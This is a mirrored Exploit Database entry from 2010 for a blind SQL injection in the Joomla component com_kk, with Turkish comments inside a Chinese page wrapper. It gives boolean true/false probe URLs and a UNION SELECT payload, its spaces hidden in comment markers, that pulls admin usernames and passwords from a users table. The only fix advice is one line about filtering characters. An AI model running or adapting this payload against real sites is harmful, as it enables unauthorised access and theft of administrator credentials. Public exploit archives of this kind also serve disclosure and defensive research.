Joomla! Component com_kk – Blind SQL Injection

• Exploit Database
• 34 阅读

• 作者： Pyske
  日期： 2010-01-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11033/

• <------------------- header data start ------------------- >
  
  #############################################################
  # Joomla Component com_kk Blind SQL Injection Vulnerability
  #############################################################
  
  # Author : Pyske | Bug Researchers
  
  
  # Name : com_kk
  
  
  # Bug Type : Blind SQL Injection
  
  
  # Infection : Admin login bilgileri alinabilir.
  
  
  # Demo Vuln. :
  
  TRUE(+)
  
  http://localhost/index.php?option=com_kk&kat=1 and 1=1
  
  FALSE(-)
  
  http://localhost/index.php?option=com_kk&kat=1 and 1=0
  
  # Bug Fix Advice : Zararli karakterler filtrelenmelidir.
  
  #############################################################
  
  < ------------------- header data end of ------------------- >
  
  < -- bug code start -- >
  
  path /index.php?option=com_kk&kat=1/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/klhtrade_users
  
  < -- bug code end of -- >
  _________________________________________________________________